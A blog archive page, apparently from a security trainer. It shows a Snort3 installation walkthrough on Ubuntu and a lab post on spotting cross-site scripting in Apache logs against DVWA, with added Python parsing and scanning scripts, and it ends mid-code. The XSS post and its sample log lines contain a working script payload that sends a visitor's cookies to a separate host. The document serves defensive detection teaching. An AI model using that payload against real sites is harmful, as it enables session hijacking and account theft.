
Friday, February 5, 2021

Snort3 on Ubuntu 20 - The Initial Setup

Now that Cisco has released Snort3 via general availability, I decided to do a quick 4 part series on its installation, learning a little about Snort3, feeding the pig and Snort3 housekeeping.

Back in 2014, I did a post on "Building snort 3.0 (snort++)". With 6 years elapsing, I wanted to see what has changed with the installation and thus this new series.

Additionally, and more importantly, I'm sure we will eventually transition the SANS SEC503 Intrusion Detection in Depth class to Snort3. When we do, I doubt whether we will show you how to install and configure Snort3. Thus this 4-part series and the associated reference materials below are also being made available, so our SEC503 students have the resources readily available if and/or when they choose to perform an install and/or configuration of Snort3.

For this post, we will leverage my previous post in conjunction with Snort 3.1.0.0 on Ubuntu 18 & 20 - Configuring a Full NIDS & SIEM by Noah Dietrich from the snort.org website as well as additional information from other sources.

This is all based on a clean installation of Ubuntu 20 minimal install on VirtualBox.

securitynik@snort3:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 20.04.1 LTS
Release:	20.04
Codename:	focal

Note: If you choose to install VirtualBox tools from the "CD", you may get an error about "This system is currently not set up to build kernel modules." To resolve this, execute:

securitynik@snort3:~$ sudo apt install virtualbox-guest-utils virtualbox-guest-dkms

As always, we expect your system to be fully updated and hardened. There are various hardening guides online, such as those from the Center For Internet Security. However, to ensure your system is at least updated, run the following:

securitynik@snort3:~$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade -y

Depending on your install, you may also need to install gcc and make:

securitynik@snort3:~$ sudo apt-get install gcc make

Time is of great importance. To ensure your system time reflects your time zone, use the following commands. Note also that you should consider taking advantage of NTP as I've done below, rather than manually configuring your time.

First list the available time zones

securitynik@snort3:~$ sudo timedatectl list-timezones
Africa/Abidjan
Africa/Accra
Africa/Algiers

....
America/Tijuana
America/Toronto
America/Vancouver
America/Whitehorse
America/Winnipeg
....

I will set mine as America/Toronto, while I keep my hardware clock (RTC) in UTC and use an NTP server. Keeping the RTC in local time can be problematic when using NTP, as the time may not be properly updated during shifts to and from daylight saving time.

securitynik@snort3:~$ sudo timedatectl set-timezone America/Toronto
securitynik@snort3:~$ sudo timedatectl set-local-rtc False
securitynik@snort3:~$ sudo timedatectl set-ntp True

Verifying the time configuration.

securitynik@snort3:~$ sudo timedatectl 
               Local time: Wed 2021-01-27 11:14:29 EST 
           Universal time: Wed 2021-01-27 16:14:29 UTC 
                 RTC time: Wed 2021-01-27 16:14:29     
                Time zone: America/Toronto (EST, -0500)
System clock synchronized: yes                         
              NTP service: active                      
          RTC in local TZ: no

Do note, if you are monitoring intrusion events (via Snort, SIEM or any other tool) across different time zones, you are better off having your systems in UTC time. This makes it easy to correlate activities across these various time zones. 

With time properly configured, let's now install Snort3 by starting with its dependencies.

In my previous install, I did a lot of compiling of code. It looks like that is still the case at this time and will probably be that way for a while. I hope sooner rather than later, it is incorporated within a package manager.

Let's first create a directory to store our downloaded files

securitynik@snort3:~$ pwd
/home/securitynik
securitynik@snort3:~$ mkdir snort-files
securitynik@snort3:~$ cd snort-files/

Now that we are inside the snort-files folder, let's grab the pre-requisites.

securitynik@snort3:~/snort-files$ sudo apt-get install -y build-essential \
autotools-dev libdumbnet-dev libluajit-5.1-dev libpcap-dev zlib1g-dev \
pkg-config libhwloc-dev cmake liblzma-dev openssl libssl-dev cpputest \
libsqlite3-dev libtool uuid-dev git autoconf bison flex libcmocka-dev \
libnetfilter-queue-dev libunwind-dev libmnl-dev ethtool

Next install Safe C Library (safeclib) from GitHub.

securitynik@snort3:~/snort-files$ git clone https://github.com/rurban/safeclib.git
securitynik@snort3:~/snort-files$ cd safeclib/
securitynik@snort3:~/snort-files/safeclib$ build-aux/autogen.sh
securitynik@snort3:~/snort-files/safeclib$ ./configure && make && sudo make install

Next we install pcre-8.44 as specified so that we can leverage Hyperscan for fast pattern matching.

securitynik@snort3:~/snort-files$ wget https://ftp.pcre.org/pub/pcre/pcre-8.44.tar.gz
securitynik@snort3:~/snort-files$ tar --extract --verbose --gzip --file pcre-8.44.tar.gz
securitynik@snort3:~/snort-files$ cd pcre-8.44/
securitynik@snort3:~/snort-files/pcre-8.44$ ./configure && make && sudo make install

After pcre-8.44 we next install gperftools (originally Google Performance Tools)

securitynik@snort3:~/snort-files$ git clone https://github.com/gperftools/gperftools.git
securitynik@snort3:~/snort-files$ cd gperftools
securitynik@snort3:~/snort-files/gperftools$ ./autogen.sh 
securitynik@snort3:~/snort-files/gperftools$ ./configure && make && sudo make install

Next up, install the Ragel State Machine Compiler. If you wish to install the latest version as of this writing, which is 7.0.3, you will need to install the Colm Programming Language. I stuck with version 6 as described in the Snort document, as Colm produced some errors which I did not wish to spend much time troubleshooting.

securitynik@snort3:~/snort-files$ wget http://www.colm.net/files/ragel/ragel-6.10.tar.gz
securitynik@snort3:~/snort-files$ tar --extract --gzip --verbose --file ragel-6.10.tar.gz 
securitynik@snort3:~/snort-files$ cd ragel-6.10/
securitynik@snort3:~/snort-files/ragel-6.10$ ./configure && make && sudo make install

Next up, we download but DO NOT install the Boost C++ libraries. We also verify the file hash against the SHA256 hash published on the website.

securitynik@snort3:~/snort-files$ wget https://boostorg.jfrog.io/artifactory/main/release/1.75.0/source/boost_1_75_0.tar.gz

securitynik@snort3:~/snort-files$ sha256sum boost_1_75_0.tar.gz 
aeb26f80e80945e82ee93e5939baebdca47b9dee80a07d3144be1e1a6a66dd6a  boost_1_75_0.tar.gz

securitynik@snort3:~/snort-files$ tar --extract --verbose --file boost_1_75_0.tar.gz 

Let's grab Hyperscan.

securitynik@snort3:~/snort-files$ git clone https://github.com/intel/hyperscan
securitynik@snort3:~/snort-files$ cd hyperscan
securitynik@snort3:~/snort-files/hyperscan$ cmake -DCMAKE_INSTALL_PREFIX=/usr/local -DBOOST_ROOT=~/snort-files/boost_1_75_0/ ../hyperscan/
securitynik@snort3:~/snort-files/hyperscan$ make && sudo make install

Install flatbuffers

securitynik@snort3:~/snort-files$ git clone https://github.com/google/flatbuffers.git
securitynik@snort3:~/snort-files$ mkdir flatbuffers-build
securitynik@snort3:~/snort-files$ cd flatbuffers-build/
securitynik@snort3:~/snort-files/flatbuffers-build$ cmake ../flatbuffers
securitynik@snort3:~/snort-files/flatbuffers-build$ make && sudo make install

Next up, install the Data Acquisition Library (DAQ)

securitynik@snort3:~/snort-files$ git clone https://github.com/snort3/libdaq.git
securitynik@snort3:~/snort-files$ cd libdaq/
securitynik@snort3:~/snort-files/libdaq$ ./bootstrap 
securitynik@snort3:~/snort-files/libdaq$ ./configure && make && sudo make install

Wheewwww! That is a lot of pre-requisites. Hopefully, they can package all of these up via a package manager to make the install process easier. Note, if you don't install them in the order provided, you can expect one or more products to complain about dependencies on other products.

Finally, let's update the shared library cache.

securitynik@snort3:~$ sudo ldconfig

Now for the main course. Let's install Snort3. Because sometime after this install I would like to see what the command shell looks like, I'm also enabling that via the configure script along with the ability to process PCAPs over two Gigabytes.

securitynik@snort3:~/snort-files$ wget https://www.snort.org/downloads/snortplus/snort3-3.1.0.0.tar.gz
securitynik@snort3:~/snort-files$ tar --extract --verbose --gzip --file snort3-3.1.0.0.tar.gz 
securitynik@snort3:~/snort-files$ cd snort3-3.1.0.0/
securitynik@snort3:~/snort-files/snort3-3.1.0.0$ ./configure_cmake.sh --prefix=/usr/local --enable-tcmalloc  --enable-shell --enable-large-pcap  
securitynik@snort3:~/snort-files/snort3-3.1.0.0$ cd build/
securitynik@snort3:~/snort-files/snort3-3.1.0.0/build$ make && sudo make install

Once I run snort --version, we see what seems to suggest we are good to go.

securitynik@snort3:~$ snort --version

   ,,_     -*> Snort++ <*-
  o"  )~   Version 3.1.0.0
   ''''    By Martin Roesch & The Snort Team
           http://snort.org/contact#team
           Copyright (C) 2014-2020 Cisco and/or its affiliates. All rights reserved.
           Copyright (C) 1998-2013 Sourcefire, Inc., et al.
           Using DAQ version 3.0.0
           Using LuaJIT version 2.1.0-beta3
           Using OpenSSL 1.1.1f  31 Mar 2020
           Using libpcap version 1.9.1 (with TPACKET_V3)
           Using PCRE version 8.44 2020-02-12
           Using ZLIB version 1.2.11
           Using FlatBuffers 1.12.0
           Using Hyperscan version 5.4.0 2021-01-28
           Using LZMA version 5.2.4

Running a test using the default configuration, we see below Snort successfully validated the configuration (with 0 warnings).

securitynik@snort3:~$ snort -c /usr/local/etc/snort/snort.lua 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
Loading /usr/local/etc/snort/snort.lua:
Loading snort_defaults.lua:
Finished snort_defaults.lua:
Loading file_magic.lua:
Finished file_magic.lua:
	ssh
	hosts
	host_cache
	pop
	...
	stream_file
Finished /usr/local/etc/snort/snort.lua:
--------------------------------------------------
pcap DAQ configured to passive.

Snort successfully validated the configuration (with 0 warnings).
o")~   Snort exiting

Oink! Onik! Our piggy is preparing to fly. See you in the next post where we learn a little bit more about Snort3 before feeding it via rules and performing house keeping.


References:

https://www.snort.org/snort3

https://snort.org/documents

https://www.snort.org/downloads

https://www.securitynik.com/2014/12/building-snort-30-snort.html

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/003/979/original/Snort3_3.1.0.0_on_Ubuntu_18___20.pdf

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/175/original/Snort_3_Multiple_Packet_Threads_Processing.pdf

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/013/original/Snort_IPS_using_DAQ_AFPacket.pdf

https://www.youtube.com/watch?v=W1pb9DFCXLw&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-&index=1

https://askubuntu.com/questions/1140770/this-system-is-currently-not-set-up-to-build-kernel-modules-please-install-the

https://github.com/rurban/safeclib

https://www.hyperscan.io/

https://github.com/intel/hyperscan

https://github.com/gperftools/gperftools

https://www.colm.net/open-source/ragel/

https://www.boost.org/

http://google.github.io/flatbuffers/

https://www.snort.org/faq/readme-daq

http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node7.html

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/023/original/ids2ips.txt

https://github.com/snort3/libdaq

https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/016/344/original/snort_reference.html

https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/016/343/original/snort_user.html

https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/016/342/original/snort_devel.html

https://blog.snort.org/2015/03/basic-snort-usage.html

https://geekflare.com/nginx-error-while-loading-shared-libraries-libpcre-so-1/

https://usermanual.wiki/Document/snortmanual.1752822391.pdf

https://www.youtube.com/watch?v=PYP0YH2PVuo&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-&index=2

https://www.usenix.org/sites/default/files/conference/protected-files/nsdi19_slides_wang_xiang.pdf

Snort3 on Ubuntu 20 - Learning a little about our installation - Getting Help, Running Snort3, etc

In the previous post, we performed the install of Snort3. In this post, we learn a little about Snort3 before we start feeding it via rules and then perform some housekeeping.

Getting help!

securitynik@snort3:~$ snort --help

Snort has several options to get more help:

-? list command line options (same as --help)
--help this overview of help
--help-commands [<module prefix>] output matching commands
--help-config [<module prefix>] output matching config options
--help-counts [<module prefix>] output matching peg counts
--help-limits print the int upper bounds denoted by max*
--help-module <module> output description of given module
--help-modules list all available modules with brief help
....

To get help for a particular component, we can then run, for example:

securitynik@snort3:~$ snort --help-commands
appid.enable_debug(proto, src_ip, src_port, dst_ip, dst_port): enable appid debugging
appid.disable_debug(): disable appid debugging
appid.reload_third_party(): reload appid third-party module
appid.reload_detectors(): reload appid detectors
host_cache.dump(file_name): dump host cache
...

To learn about the plugins

securitynik@snort3:~$ snort --list-plugins | more
codec::arp v0 static
codec::auth v0 static
codec::bad_proto v0 static
codec::ciscometadata v0 static
codec::erspan2 v0 static
codec::erspan3 v0 static
codec::esp v0 static
codec::eth v0 static
codec::fabricpath v0 static
codec::gre v0 static
....

To see some of the command line options available, you can look at the --help-options.

securitynik@snort3:~$ snort --help-options
-? <option prefix> output matching command line option quick help (same as --help-options) (optional)
-A <mode> set alert mode: none, cmg, or alert_*
-B <mask> obfuscated IP addresses in alerts and packet dumps using CIDR mask
-C print out payloads with character data only (no hex)
-c <conf> use this configuration
-D run Snort in background (daemon) mode
-d dump the Application Layer
-e display the second layer header info
-f turn off fflush() calls after binary log writes
-G <0xid> (same as --logid) (0:65535)
-g <gname> run snort gid as <gname> group (or gid) after initialization
-H make hash tables deterministic
-i <iface>... list of interfaces
...

While this system has tcpdump installed by default, let's also install TShark.

securitynik@snort3:~$ sudo apt-get install tshark

Using tcpdump, I captured 21,044 packets with the following.

securitynik@snort3:~$ sudo tcpdump -n --interface enp0s3 -v -w securitynik-sample.pcap
tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes
Got 1448

Got 1448
^C21044 packets captured
21044 packets received by filter
0 packets dropped by kernel

Using TShark, let's now see what is in this file.

securitynik@snort3:~$ tshark -n -r securitynik-sample.pcap -q -z io,phs
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:21044 bytes:178288931
  ip                                     frames:20780 bytes:178275019
    udp                                  frames:851 bytes:118457
      dns                                frames:819 bytes:115601
      ntp                                frames:24 bytes:2160
      mdns                               frames:8 bytes:696
    tcp                                  frames:19929 bytes:178156562
      http                               frames:156 bytes:28081
        media                            frames:1 bytes:1448
          tcp.segments                   frames:1 bytes:1448
      tls                                frames:7855 bytes:164523943
        tcp.segments                     frames:7572 bytes:164188303
          tls                            frames:7555 bytes:163997610
  arp                                    frames:256 bytes:13056
  ipv6                                   frames:8 bytes:856
    udp                                  frames:8 bytes:856
      mdns                               frames:8 bytes:856
===================================================================

Doing some basic processing on the file with Snort3, we see 1 PCAP with 21,044 records received and analyzed, just as we captured. We also got information on the timing for the processing of these packets. Looks like Snort3 processed all 21,044 packets in under 1 second.

securitynik@snort3:~$  snort --pcap-list securitynik-sample.pcap 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
pcap DAQ configured to read-file.
Commencing packet processing
++ [0] securitynik-sample.pcap
-- [0] securitynik-sample.pcap
--------------------------------------------------
Packet Statistics
--------------------------------------------------
daq
                    pcaps: 1
                 received: 21044
                 analyzed: 21044
                    allow: 21044
                 rx_bytes: 16259569
--------------------------------------------------
codec
                    total: 21044       	(100.000%)
                 discards: 17392       	( 82.646%)
                      arp: 256         	(  1.216%)
                      eth: 21044       	(100.000%)
                     ipv4: 20780       	( 98.745%)
                     ipv6: 8           	(  0.038%)
                      tcp: 11046       	( 52.490%)
                      udp: 859         	(  4.082%)
--------------------------------------------------
Module Statistics
--------------------------------------------------
detection
                 analyzed: 21044
--------------------------------------------------
tcp
        bad_tcp4_checksum: 8071
--------------------------------------------------
udp
        bad_udp4_checksum: 430
        bad_udp6_checksum: 8
--------------------------------------------------
Summary Statistics
--------------------------------------------------
timing
                  runtime: 00:00:00
                  seconds: 0.486754
                 pkts/sec: 21044
                Mbits/sec: 124
o")~   Snort exiting
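To make the sanity check above repeatable, here is a small parser for Snort3's packet-statistics summary (an added example, not Snort's own code or part of the original post). It reads the daq, codec, tcp and udp counters, flags any gap between received and analyzed, and reports the share of packets failing checksum validation; the 10% threshold is an assumed value. A high bad-checksum count on a capture taken on the sensor itself is commonly caused by checksum offload on the capturing NIC, which is worth ruling out before trusting those counters.

```python
import re
from typing import Dict, List

# Sample input: the "Packet Statistics" summary printed above by
# snort --pcap-list, trimmed to the sections this check reads.
SAMPLE_STATS = """\
Packet Statistics
--------------------------------------------------
daq
                    pcaps: 1
                 received: 21044
                 analyzed: 21044
                    allow: 21044
                 rx_bytes: 16259569
--------------------------------------------------
codec
                    total: 21044       \t(100.000%)
                 discards: 17392       \t( 82.646%)
                      arp: 256         \t(  1.216%)
                      eth: 21044       \t(100.000%)
                     ipv4: 20780       \t( 98.745%)
                     ipv6: 8           \t(  0.038%)
                      tcp: 11046       \t( 52.490%)
                      udp: 859         \t(  4.082%)
--------------------------------------------------
tcp
        bad_tcp4_checksum: 8071
--------------------------------------------------
udp
        bad_udp4_checksum: 430
        bad_udp6_checksum: 8
--------------------------------------------------
"""

# A section header is an unindented single word; a counter is an indented
# "name: integer" line (the trailing percentage column is ignored).
SECTION_RE = re.compile(r"^(\w+)$")
COUNTER_RE = re.compile(r"^\s+(\w+):\s+(\d+)")


def parse_snort_stats(text: str) -> Dict[str, Dict[str, int]]:
    """Parse Snort3's summary into {section: {counter: value}}."""
    stats: Dict[str, Dict[str, int]] = {}
    section = None
    for line in text.splitlines():
        header = SECTION_RE.match(line)
        if header:
            section = header.group(1)
            stats.setdefault(section, {})
            continue
        counter = COUNTER_RE.match(line)
        if counter and section is not None:
            stats[section][counter.group(1)] = int(counter.group(2))
    return stats


def _bad_ratio(stats: Dict[str, Dict[str, int]], proto: str) -> float:
    """Share of decoded <proto> packets whose checksum failed validation."""
    decoded = stats.get("codec", {}).get(proto, 0)
    bad = sum(v for k, v in stats.get(proto, {}).items() if k.startswith("bad_"))
    return bad / decoded if decoded else 0.0


def sensor_health(stats: Dict[str, Dict[str, int]], max_bad_ratio: float = 0.10) -> Dict[str, object]:
    """Flag packets lost between DAQ and detection and unusual checksum failure rates.

    max_bad_ratio is an assumed threshold for this example, not a Snort default.
    """
    daq = stats.get("daq", {})
    received, analyzed = daq.get("received", 0), daq.get("analyzed", 0)
    findings: List[str] = []
    if received != analyzed:
        findings.append(f"{received - analyzed} packets received but not analyzed")
    ratios = {p: _bad_ratio(stats, p) for p in ("tcp", "udp")}
    for proto, ratio in ratios.items():
        if ratio > max_bad_ratio:
            findings.append(f"{ratio:.1%} of {proto} packets failed checksum validation")
    return {"received": received, "analyzed": analyzed,
            "bad_checksum_ratio": ratios, "findings": findings}


if __name__ == "__main__":
    for finding in sensor_health(parse_snort_stats(SAMPLE_STATS))["findings"]:
        print(finding)
```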

If you wish to dump contents of the PCAP file add the "-L dump" option or go even further by adding the "-d" to dump the application data. In this case I will add "-n" to only show 1 packet.

securitynik@snort3:~$ snort --pcap-list securitynik-sample.pcap -L dump -d -n 1 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
pcap DAQ configured to read-file.
Commencing packet processing
++ [0] securitynik-sample.pcap
pkt:1	
eth(DLT):  08:00:27:2A:BA:15 -> 52:54:00:12:35:02  type:0x0800
ipv4(0x0800):  10.0.2.15 -> 64.71.255.198
	Next:0x11 TTL:64 TOS:0x0 ID:55133 IpLen:20 DgmLen:86 DF

snort.raw[66]:
- - - - - - - - - - - -  - - - - - - - - - - - -  - - - - - - - - -
9F 59 00 35 00 42 4C 70  9C 9D 01 00 00 01 00 00  .Y.5.BLp ........
00 00 00 01 12 63 6F 6E  6E 65 63 74 69 76 69 74  .....con nectivit
79 2D 63 68 65 63 6B 06  75 62 75 6E 74 75 03 63  y-check. ubuntu.c
6F 6D 00 00 01 00 01 00  00 29 02 00 00 00 00 00  om...... .)......
00 00                                             ..
- - - - - - - - - - - -  - - - - - - - - - - - -  - - - - - - - - -

While reading back data from a PCAP file is cool, Snort3 is more than likely going to be running in live mode most of the time. Here is what it looks like once you decide to run snort from the command line.

First off, decide on the interface or interfaces you wish to capture traffic on. Here is the list of interfaces on my VM.

securitynik@snort3:~$  ip address show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:2a:ba:15 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute enp0s3
       valid_lft 59259sec preferred_lft 59259sec
    inet6 fe80::8adb:ccd9:2479:82c3/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:eb:40:cd brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.116/24 brd 10.0.0.255 scope global dynamic noprefixroute enp0s8
       valid_lft 459sec preferred_lft 459sec
    inet6 fe80::2cf1:a00b:bcce:f58c/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Let's tell Snort3 to capture traffic on the two non-loopback interfaces. Note, while I'm using two interfaces separated by a colon, you can instead use one interface, as would be the case on most installs of an IDS.

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8
[sudo] password for securitynik: 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
pcap DAQ configured to passive.
Commencing packet processing
++ [0] enp0s3:enp0s8
...

You might notice above that the output says "pcap DAQ configured to passive". To enable inline mode operations, leverage the -Q option, as shown next.

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8 -v -Q
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
Inspection Policy : policy id 0 : 
--------------------------------------------------
pcap DAQ configured to inline.
--------------------------------------------------
host_cache
    memcap: 8388608 bytes
Commencing packet processing
++ [0] enp0s3:enp0s8
Instance 0 daq pool size: 256
Instance 0 daq batch size: 64
...

You more than likely want to run snort in IDS or IPS mode. Thus you would take advantage of a configuration file. Let's use the default one which comes with Snort3 and which we used in the previous post.

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8 -v -Q -c /usr/local/etc/snort/snort.lua 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
Loading /usr/local/etc/snort/snort.lua:
....

Finished /usr/local/etc/snort/snort.lua:
--------------------------------------------------
Inspection Policy : policy id 0 : /usr/local/etc/snort/snort.lua
--------------------------------------------------
.....
stream_tcp:
             flush_factor: 0
                  max_pdu: 16384
               max_window: 0
                   no_ack: disabled
            overlap_limit: 0
                   policy: bsd
              queue_limit: { max_bytes = 1048576, max_segments = 2621 }
         reassemble_async: enabled
             require_3whs: -1 (disabled)
          session_timeout: 30
           small_segments: { count = 0, maximum_size = 0 }
               track_only: disabled
--------------------------------------------------
stream_udp:
          session_timeout: 30
--------------------------------------------------
stream_user:
          session_timeout: 30
--------------------------------------------------
telnet:
        ayt_attack_thresh: -1
          check_encrypted: disabled
        encrypted_traffic: disabled
                normalize: disabled
--------------------------------------------------
wizard:
--------------------------------------------------
pcap DAQ configured to inline.
--------------------------------------------------
host_cache
    memcap: 8388608 bytes
Commencing packet processing
++ [0] enp0s3:enp0s8
Instance 0 daq pool size: 256
Instance 0 daq batch size: 64

Let's see now what the "--talos" option shows us. The Snort reference manual is not very verbose on this. It simply says it "enables Talos tweak", whatever that means. Additionally, instead of using "--talos", you can use "--tweaks talos".

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8 -Q -c /usr/local/etc/snort/snort.lua \
--tweaks talos --pcap-list securitynik-sample.pcap -R local.rules -q

##### securitynik-sample.pcap #####
	[1:1:0] Nik Testing (alerts: 2825)
#####
--------------------------------------------------
rule profile (all, sorted by total_time)
#       gid   sid rev    checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends
=       ===   === ===    ====== ======= ====== ========= ========= ========= ============= ======== ========
1         1     1   0      2908    2908   2825      1863         0         0             0        0        0

We see above information on our test rule. Not to worry, we will look at rules in the next post where we feed the pig. Remember, rules give the pig wings :-)

Saturday, February 4, 2017

Beginning Web Application Testing: Detecting Cross Site Scripting (XSS)–DVWA

In the Cyber Security investigation realm, “Indicators of Compromise” are a significant component in determining whether or not you have been compromised. Note that it says “Indicators”; it does not say yes or no, you have been compromised.

Those indicators come primarily from one of two sources: either the logs or the packets traversing the network. However, there are still other sources we can leverage that are based directly on the host, such as information from the browser’s cache (as we will see later), the file system, the registry, or even a process running in memory.

For this detection, let’s focus on logs seen at the web server and the data in the client’s browser cache. I’ve copied the logs and stored them in the “/tmp” folder on Kali.

Let’s go hunting!!
First let’s take a look at the contents of the file we have.


The contents of the file above bring up a sad (my word) reality. Many times you will have log files with tons of data and will not know where to start looking. This is exactly the reason why having indicators of compromise is important. However, for those situations when you don’t have a known bad, I will post a later blog entry on how you can go about detecting these.

Moving along!!
If we look at the log we can see lots of URL-encoded entries, e.g. “%3Cscript%3E”. Let’s go through the logs to understand what is going on here. But first let’s extract a log entry and try to make sense of its structure.

10.0.0.1 - - [04/Feb/2017:13:34:12 -0500] "GET /dvwa/security.php HTTP/1.1" 200 5850 "http://10.0.0.102/dvwa/vulnerabilities/xss_r/?name=+%3Cscript%3Ewindow.location%3D%27http%3A%2F%2F10.0.0.101%2FstealCookie.txt%3F%27%2Bdocument.cookie%3C%2Fscript%3E&user_token=fdab3756ce90d020d8630cfcdadacfa7" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0"

There is a lot of information in this log entry, which you can learn about from the previous blog on detecting web authentication brute forcing. For our purpose, let’s use what is most helpful at this time.

From reference (1) below, we know this log is in Apache’s “Combined Log Format”. As a result, we will pay attention to the “Request line from the client”.

Analysis of the requests.
Looking first at the HTTP methods used, below we see 72 (the majority) of our requests use the “GET” method. We also see 6 “POST” requests. Don’t be fooled into believing that you only need to focus on the ones with the most noise. When doing an investigation you should be more fearful of the things you see less of.

cat xss.log | cut --fields 2 --delimiter "]" | cut --fields 1 --delimiter "/" | sort | uniq --count | sort --numeric --reverse

Looking closer at the “GET” method we see:

cat xss.log --number | grep --perl-regexp 'GET.*?"' --only-matching | sort | uniq --count | sort --numeric --reverse

Looking at the above, we see what seems normal and, definitely, what seems abnormal among the “GET” methods used. There seem to be 8 entries which are URL encoded.

Let’s now turn to our friend, Python3’s “urllib”, to help us solve one of these problems.

Decoding “GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2F10.0.0.101%2FstealCookie.txt%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1”

Python3 to the rescue.


From the above it seems the user executed “<script>window.location='http://10.0.0.101/stealCookie.txt?'+document.cookie</script>” in the “name” parameter field.

Obviously we would want to go through each of those to see what was sent. However, I believe if you have reached this far in reading this, then you should have gotten the picture.
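To apply this decoding across a whole log rather than one entry at a time, here is an added example (not part of the original post) that parses combined-format lines, decodes the query string of both the request line and the Referer with urllib.parse, and flags parameters carrying script markers. The three sample lines are constructed from the entry shown above; the marker list is an assumption for illustration, not an exhaustive signature set.

```python
import re
from html import unescape
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "Combined Log Format": the first two reuse
# the encoded payload seen above (once in the Referer, once in the request
# line); the third is a benign request.
SAMPLE_LOG = [
    '10.0.0.1 - - [04/Feb/2017:13:34:12 -0500] "GET /dvwa/security.php HTTP/1.1" 200 5850 '
    '"http://10.0.0.102/dvwa/vulnerabilities/xss_r/?name=+%3Cscript%3Ewindow.location%3D%27'
    'http%3A%2F%2F10.0.0.101%2FstealCookie.txt%3F%27%2Bdocument.cookie%3C%2Fscript%3E'
    '&user_token=fdab3756ce90d020d8630cfcdadacfa7" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0"',
    '10.0.0.1 - - [04/Feb/2017:13:34:10 -0500] "GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3E'
    'window.location%3D%27http%3A%2F%2F10.0.0.101%2FstealCookie.txt%3F%27%2Bdocument.cookie'
    '%3C%2Fscript%3E HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0)"',
    '10.0.0.1 - - [04/Feb/2017:13:30:01 -0500] "GET /dvwa/index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

# host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Markers that only become visible once the query string is decoded (assumed list).
XSS_MARKERS = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=|document\.cookie", re.IGNORECASE)


def parse_combined(line: str):
    """Split one combined-format line into its fields; None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry


def decoded_params(url: str) -> dict:
    """Return the query parameters of url, percent-decoded until stable.

    parse_qsl decodes one layer; the loop peels further layers so that a
    double-encoded %253Cscript%253E still surfaces, and html.unescape turns
    entity-encoded markers (&lt;script&gt;) back into characters.
    """
    params = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        while "%" in value:
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        params[key] = unescape(value)
    return params


def xss_indicators(line: str) -> list:
    """Findings for one log line, checking both the request URL and the Referer."""
    entry = parse_combined(line)
    if entry is None:
        return []
    targets = []
    request = entry["request"].split()
    if len(request) >= 2:
        targets.append(("request", request[1]))
    if entry["referer"] not in ("-", ""):
        targets.append(("referer", entry["referer"]))
    findings = []
    for where, url in targets:
        for key, value in decoded_params(url).items():
            if XSS_MARKERS.search(value):
                findings.append({"client": entry["host"], "time": entry["time"],
                                 "where": where, "param": key, "payload": value.strip()})
    return findings


def scan_log(lines) -> list:
    """Run the indicator check over every line of a log."""
    return [f for line in lines for f in xss_indicators(line)]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
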